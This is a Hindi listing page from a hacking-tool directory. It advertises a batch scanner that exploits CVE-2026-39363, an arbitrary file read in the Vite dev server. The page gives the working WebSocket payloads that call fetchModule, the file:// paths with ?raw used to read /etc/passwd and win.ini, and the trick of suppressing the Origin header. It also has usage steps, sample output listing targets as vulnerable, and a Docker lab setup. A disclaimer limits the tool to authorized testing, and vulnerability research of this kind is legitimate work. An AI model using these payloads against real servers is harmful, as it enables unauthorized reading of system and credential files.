Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-39363 — बैच भेद्यता स्कैनर CVE-2026-39363 के लिए Vite डेव सर्वर में, WebSocket ऑरिजिन सत्यापन बायपास का शोषण करके fetchModule के साथ file:// प्रोटोकॉल के माध्यम से मनमानी फ़ाइलें पढ़ता है। | Kitploit
उपकरण/GitHubGitHub/f4s1on/cve-2026-39363
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubf4s1on/cve-2026-39363

CVE-2026-39363

बैच भेद्यता स्कैनर CVE-2026-39363 के लिए Vite डेव सर्वर में, WebSocket ऑरिजिन सत्यापन बायपास का शोषण करके fetchModule के साथ file:// प्रोटोकॉल के माध्यम से मनमानी फ़ाइलें पढ़ता है।

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-39363 — Vite Dev Server WebSocket मनमाना फ़ाइल पढ़ने की बैच जाँच

अस्वीकरण: यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक अनुसंधान के लिए है। उपयोगकर्ता को स्थानीय कानूनों और विनियमों का पालन करना चाहिए; बिना प्राधिकरण के दूसरों के सिस्टम को स्कैन करना या हमला करना अवैध है। लेखक किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं है।

भेद्यता विवरण

Vite डेवलपमेंट सर्वर (6.0.0 ~ 6.4.1, 7.0.0 ~ 7.3.1, 8.0.0 ~ 8.0.4) का HMR WebSocket Origin हेडर को सत्यापित नहीं करता है। हमलावर vite:invoke इवेंट के माध्यम से fetchModule को कॉल कर सकता है, file:// प्रोटोकॉल के साथ ?raw पैरामीटर का उपयोग करके server.fs.allow प्रतिबंध को बायपास कर सकता है और सर्वर से कोई भी फ़ाइल पढ़ सकता है।

जाँच प्रक्रिया

root@kitploit:~
url.txt → http://host:port
  ↓ host + port पार्स करें
  ↓
┌─ चरण 1: ws://host:दिया गया पोर्ट पर प्रयास करें
│  ├─ WebSocket हैंडशेक सफल + exploit सफल → भेद्यता मौजूद है
│  └─ विफल → यदि दिया गया पोर्ट == 5173 → भेद्यता मौजूद नहीं है
│
└─ चरण 3: host:5173 की जाँच करें (केवल तब जब दिया गया पोर्ट ≠ 5173)
   ├─ पोर्ट बंद → भेद्यता मौजूद नहीं है
   └─ पोर्ट खुला → WebSocket हैंडशेक + 5173 पर exploit
        ├─ सफल → भेद्यता मौजूद है
        └─ विफल → भेद्यता मौजूद नहीं है

उपयोग विधि

निर्भरताएँ स्थापित करें

root@kitploit:~
pip install -r requirements.txt

प्रॉक्सी चालू और बंद करना

प्रॉक्सी चालू करने के लिए स्क्रिप्ट की पंक्तियाँ 26-27 की टिप्पणी हटाएँ

root@kitploit:~
# प्रॉक्सी चालू करने के लिए, नीचे दो पंक्तियों की टिप्पणी हटाएँ और सही प्रॉक्सी पता और पोर्ट सेट करें
# os.environ["HTTP_PROXY"] = "http://127.0.0.1:8083"
# os.environ["HTTPS_PROXY"] = "http://127.0.0.1:8083"

लक्ष्य तैयार करें

url.txt में लक्ष्य URL लिखें, प्रत्येक पंक्ति में एक:

root@kitploit:~
http://192.168.1.100:5173
http://example.com
http://target.cn:8080

चलाएँ

root@kitploit:~
python cve_2026_39363.py

आउटपुट

टर्मिनल:

root@kitploit:~
[*] Loaded 3 URL(s), scanning with 3 thread(s)...

http://192.168.1.100:5173 存在漏洞 (Linux)
http://example.com 存在漏洞 (Linux)
http://target.cn:8080 不存在漏洞

[*] Done. 2/3 vulnerable, elapsed 3.2s
[*] Results saved to result.txt

result.txt:

root@kitploit:~
http://192.168.1.100:5173 (Linux)
http://example.com:5173 (Linux)

प्रत्येक पंक्ति में POC प्रकार (Linux / Windows) शामिल है, जो सफलतापूर्वक पढ़ी गई फ़ाइल की विशेषता को दर्शाता है।

POC सत्यापन फ़ाइलें

लक्ष्य प्रणालीपढ़ी गई फ़ाइलविशेषता मार्कर
Linuxfile:///etc/passwd?rawroot:
Windowsfile:///C:/Windows/win.ini?rawfor 16-bit app support

Exploit Payload

दो payload प्रारूप समर्थित हैं (क्रम में प्रयास किए जाते हैं):

  1. Vulhub PoC प्रारूप: {"id":"send:0","name":"fetchModule","data":[file_path]}
  2. आंतरिक RPC प्रारूप: {"fn":"fetchModule","args":[file_path]}

WebSocket प्रमुख पैरामीटर

पैरामीटरमानकारण
उप-प्रोटोकॉलvite-hmrVite HMR WebSocket आवश्यकता
Originभेजना दबाया गया (suppress_origin=True)Vite Origin हेडर वाले गैर-ब्राउज़र कनेक्शन को अस्वीकार करता है

Docker भेद्यता वातावरण परीक्षण

root@kitploit:~
# प्रारंभ करें
docker run -d --name vite-vuln -p 5173:5173 vulhub/vite:7.3.1

# स्कैन करें
echo "http://127.0.0.1:5173" > url.txt
python cve_2026_39363.py

# साफ़ करें
docker stop vite-vuln && docker rm vite-vuln

सामान्य प्रश्न

प्रश्न: सभी जाँचें "भेद्यता मौजूद नहीं है" लौटाती हैं?

  • पुष्टि करें कि लक्ष्य पोर्ट 5173 खुला है
  • पुष्टि करें कि Vite dev server ने --host या server.host के साथ नेटवर्क पर उपलब्ध है
  • पुष्टि करें कि WebSocket को server.ws: false द्वारा अक्षम नहीं किया गया है

प्रश्न: Windows पर आउटपुट गड़बड़ है?

  • स्क्रिप्ट स्वचालित रूप से संभालती है, यदि समस्या बनी रहती है तो टर्मिनल UTF-8 एन्कोडिंग में है इसकी पुष्टि करें

प्रश्न: PowerShell द्वारा उत्पन्न url.txt पार्स नहीं हो रहा है?

  • स्क्रिप्ट BOM को स्वचालित रूप से छोड़ने के लिए utf-8-sig का उपयोग करती है
टूल डाउनलोड करें